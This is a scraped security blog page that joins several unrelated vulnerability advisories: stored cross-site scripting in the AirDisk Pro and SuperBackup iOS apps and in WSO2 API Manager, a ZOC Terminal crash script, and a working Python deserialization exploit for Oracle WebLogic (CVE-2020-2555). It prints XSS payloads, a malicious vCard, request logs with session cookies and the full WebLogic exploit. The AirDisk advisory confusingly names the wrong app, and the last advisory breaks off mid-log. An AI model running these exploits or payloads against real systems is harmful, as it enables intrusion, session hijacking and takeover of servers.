# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://www.app2pro.com
# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421
# CVE: N/A
Document Title:
===============
AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2203
Release Date:
=============
2020-04-15
Vulnerability Laboratory ID (VL-ID):
====================================
2203
Common Vulnerability Scoring System:
====================================
4.5
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
File sharing with other iOS devices via Bluetooth or Wi-Fi connection
with automatic search of nearest devices.
Users can perform file operations on the application like: Copy, Move,
Zip, Unzip, Rename, Delete, Email, and more.
Easy to create file like: Text File, New folder, Playlist, Take
Photo/Video, Import From Library, and Voice Record.
AirDisk Pro allows you to store, view and manage files on your iPhone,
iPad or iPod touch. You can connect to AirDisk
Pro from any Mac or PC over the Wi-Fi network and transfer files by drag
& drop files straight from the Finder or Windows
Explorer. AirDisk Pro features document viewer, PDF reader, music
player, image viewer, voice recorder, text editor, file
manager and support most of the file operations: like delete, move,
copy, email, share, zip, unzip and more.
(Copy of the Homepage:
https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 )
(Copy of the Homepage: http://www.app2pro.com )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile
application.
Affected Product(s):
====================
Felix Yew
Product: AirDisk Pro v5.5.3 (iOS)
Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
No authentication (guest)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerability has been
discovered in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.
The first vulnerability is located in the `createFolder` parameter of
the `Create Folder` function. Attackers are able to name
or rename paths via airdisk pro ui to malicious persistent script codes.
Thus allows to execute the persistent injected script
code on the front site of the path index listing in the content itself
on each refresh. The request method to inject is POST
and the attack vector is located on the application-side. Interaction to
exploit is as well possible through the unauthenticated
started ftp service on the local network.
The second vulnerability is located in the `deleteFile` parameter of the
`Delete` function. The output location with the popup
that asks for permission to delete, allows to execute the script code.
The injection point is the file parameter and the execution
point occurs in the visible delete popup with the permission question.
The request method to inject is POST and the attack vector
is located on the application-side.
The third web vulnerability is located in the `devicename` parameter
that is displayed on the top next to the airdisk pro ui logo.
Remote attackers are able to inject own malicious persistent script code
by manipulation of the local apple devicename information.
The injection point is the devicename information and the execution
point occurs in the file sharing ui panel of the airdisk pro
mobile web-application.
Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious source and
persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] AirDisk pro Wifi UI
Vulnerable Parameter(s):
[+] createFolder
[+] deleteFile
[+] devicename
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with wifi access with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
1. Create Folder
PoC: Vulnerable Source
<tbody>
<form name="checkbox_form"></form>
<tr><td class="e"><input type="checkbox" name="selection"
value="test"></td><td class="i"><a href="test/"><img
src="/webroot/fileicons/folder.png"
width="20" height="20"></a></td><td class="n"><a
href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td
class="s"></td><td class="k">Folder</td>
<td class="e"><span style="height:15px;
width:15px;"> </span></td><td class="e"><a href="#" title="Rename
file" onclick="modalPopup("test", 0, 0);">
<img src="/webroot/webrename.png" width="15" height="15"></a></td><td
class="e"><a href="#" title="Delete file"
onclick="modalPopup("test", 2, 0);">
<img src="/webroot/webdelete.png" width="15"
height="15"></a></td></tr><tr class="c"><td class="e"><input
type="checkbox" name="selection"
value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a
href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">
<img src="/webroot/fileicons/folder.png" width="20"
height="20"></a></td><td class="n">
<a href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe
src="evil.source"></a></td>
<td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td
class="k">Folder</td><td class="e"><span style="height:15px;
width:15px;"> </span></td><td class="e">
<a href="#" title="Rename file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E"[MALICIOUS
INJECTED SCRIPT CODE!];, 0, 1);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e">
<a href="#" title="Delete file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E"[MALICIOUS
INJECTED SCRIPT CODE!];, 2, 1);">
<img src="/webroot/webdelete.png" width="15"
height="15"/></a></td></tr><tr><td class="e"><input type="checkbox"
name="selection" value="Help.webarchive" /></td>
<td class="i"><a href="Help.webarchive"><img
src="/webroot/fileicons/webarchive.png" width="20"
height="20"></a></td><td class="n">
<a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec
2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web
Archive</td>
<td class="e"><a href="#" title="Download file"
onClick="downloadFile("Help.webarchive");"><img
src="/webroot/webdownload.png"
width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename
file" onClick="modalPopup("Help.webarchive", 0, 2);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e"><a href="#" title="Delete file"
onClick="modalPopup("Help.webarchive", 2, 2);"><img
src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr>
</form>
</tbody>
</table>
</div>
--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/
Upgrade-Insecure-Requests: 1
createFolder=test>"<[MALICIOUS INJECTED SCRIPT
CODE!]>&ID=0&submitButton=Create
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 6257
Note: Adding via ftp on mkdir or file is as well possible without
authentication on default setup.
2. Delete / Old Popup
PoC: Vulnerable Source
<div id="modal-content" class="simplemodal-data" style="display: block;">
<div id="modal-title"><h3>Delete File</h3></div>
<div id="modal-text"><a>Are you sure you want to delete this
file?"test"</a></div>
<form name="input" action="" method="post">
<div id="modal-field"><input type="hidden" name="deleteFile"
value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT
CODE]"></div>
<input type="hidden" name="ID" id="ID" value="test">
<input type="submit" name="submitButton" id="submitButton" value="Delete">
</form>
</div>
--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
deleteFile=New Folder&ID=New Folder&submitButton=Delete
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4699
Note: Comes up when somebody tries to delete the malicious injected path.
3. Devicename
PoC: Vulnerable Source
<div id="headerWraper">
<table border="0" cellspacing="0" cellpadding="0" width="100%">
<tr>
<td><a href="./"><img src="/webroot/webicon.png" id="headerImg"
width="57" height="57"/></a></td>
<td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td>
</tr>
</table>
</div>
--- PoC Session logs [GET] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4612
Note: Executes each time the wifi sharing ui service of airdisk pro is
opened by the local or remote users.
Solution - Fix & Patch:
=======================
1. Disallow special chars in the folder and filenames. Sanitize all
inputs and filter all involved parameters to prevent application-side
attacks.
2. Parse the output location of the popup permission message content to
prevent further executions after injects via post method.
3. Sanitize the devicename displayed on top of the wifi user interaction
by a secure parsing mechanism.
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the application functions are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863157934
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
# 2.- Open ZOC Terminal
# 3.- Select Script > Start REXX Script...
# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
# 5.- Crashed
cod = "\x41" * 20000
f = open('ZOC_7.25.5_Script.zrx', 'w')
f.write(cod)
f.close()
# Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
# Author: nu11secur1ty
# Date: 2020-03-31
# Vendor: Oracle
# Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
# CVE: CVE-2020-2555
[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source: readme from GitHUB
[Exploit Program Code]
--------------------------
#!/usr/bin/python
# @nu11secur1ty
import socket
import os
import sys
import struct
if len(sys.argv) < 3:
print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
sys.exit()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)
# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
payloadObj = open(sys.argv[3],'rb').read()
payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
payload=struct.pack('>I',len(payload)) + payload[4:]
print '[+] Sending payload...'
sock.send(payload)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
[Vendor]
Oracle
[Vulnerability Type]
Network Remote
[Description]
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation).
Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.
Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence.
Successful attacks of this vulnerability can result in takeover of Oracle Coherence.
CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
[Disclosure Timeline]
2019/12/10
[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or reserved,
and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
[Video]
https://www.youtube.com/watch?v=59jt8rr8ECc
@nu11secur1ty
--
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting
# Date: 2020-04-13
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Softwrare link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A
# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700
Technical Details & Description:
================================
A remote Stored Cross Site Scripting has been discovered in WSO2 API
Manager Ressource Browser component).
The security vulnerability allows a remote attacker With access to the
component "Ressource Browser"
to inject a malicious code in Add Comment Feature.
The vulnerability is triggered after sending a POST request to
`/carbon/info/comment-ajaxprocessor.jsp` with Parameter
"comment=targeted&path=%2F".
Remote attackers has the ablility to spread a malware,to Hijack a session
(a session with Higher privileges), or to initiate phishing attacks.
The security risk of the Stored XSS web vulnerability is estimated as
medium with a cvss (common vulnerability scoring system) count of 5.4
Exploitation of the Stored XSS web vulnerability requires a low privilege
web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in Compromising the
server .
Request Method:
[+] POST
Module:
[+] /carbon/info/comment-ajaxprocessor.jsp
Parameters:
[+] comment=admincomment
[+] path=%2F
=======================================
POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none;
wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e;
JSESSIONID=4B3AB3AA8895F2897685FA98C327D521;
requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none;
region4_monitor_menu=none; region5_tools_menu=none;
current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close
comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F
==============================
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144
//the body of response includes attacker malicious script
<a class="closeButton icon-link registryWriteOperation"
onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete"
style="background-image:
url(../admin/images/delete.gif);position:relative;float:right"> </a>
<iframe href=http://phishing_url>
<br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker
Proof of Concept (PoC):
=======================
//Let's suppose we're Attacking an admin with higher privileges
1-Attacker opens his account
2-add arbitrary comment
3-intercepts the request
4-add malicious script to the comment
5-admin access his account,he wants to add a comment,the malicious script
got executed
===>Admin account compromised
===============================================================================
Example malicious script :
<script>
alert(document.cookie);
</script>
===============================================================================
# Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://dropouts.in/
# Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097
# CVE: N/A
Document Title:
===============
SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2202
Release Date:
=============
2020-04-15
Vulnerability Laboratory ID (VL-ID):
====================================
2202
Common Vulnerability Scoring System:
====================================
4.6
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Backup all your iPhone or iPad contacts in 1 tap and export them.
Fastest way to restore contacts from PC or Mac.
Export by mailing the backed up contacts file to yourself. Export
contacts file to any other app on your device.
Export all contacts directly to your PC / Mac over Wifi, no software
needed! Restore any contacts directly from
PC / Mac. Restore contacts via mail. Get the ultimate contacts backup
app now.
(Copy of the Homepage:
https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site web vulnerabilities in the official SuperBackup
v2.0.5 ios mobile application.
Affected Product(s):
====================
Dropouts Technologies LLP
Product: Super Backup v2.0.5
Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered
in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.
The cross site scripting web vulnerabilities are located in the
`newPath`, `oldPath` & `filename` parameters of the vcf listing module.
Remote attackers are able to inject own malicious persistent script
codes as vcf filename to the main index list. The request method to
inject is POST and the attack vector of the vulnerability is located on
the application-side. The injection point is located at the vcf
filename or import. The execution point occurs in the main index list
after the import or insert.
Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious source and
persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] VCF
Vulnerable Parameter(s):
[+] newPath (path - vcf filename)
[+] oldPath (path - vcf filename)
Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote
attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the cross site scripting
vulnerability follow the provided information and steps below to continue.
PoC: Payload (Filename)
>"<iframe%20src=evil.source%20onload=alert("PWND")></iframe>
PoC: Vulnerable Source (Listing - Index)
<button type="button" class="btn btn-default btn-xs button-download">
<span class="glyphicon glyphicon-download-alt"></span>
</button>
</td>
<td class="column-name"><p class="edit" title="Click to
rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td>
<td class="column-size">
<p>26.40 KB</p>
</td>
<td class="column-delete">
<button type="button" class="btn btn-danger btn-xs button-delete">
<span class="glyphicon glyphicon-trash"></span>
</button>
</td>
</tr></tbody></table>
</div>
PoC: Exception-Handling
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>
09:17:12:PM 10:Apr.:2020 .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source
onload=alert("PWND")></iframe> .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source
onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf"
PoC: Exploit
BEGIN:VCARD
VERSION:3.0
PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN
B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;;
END:VCARD
--- PoC Session Logs [POST] ---
http://localhost/move
Host: localhost
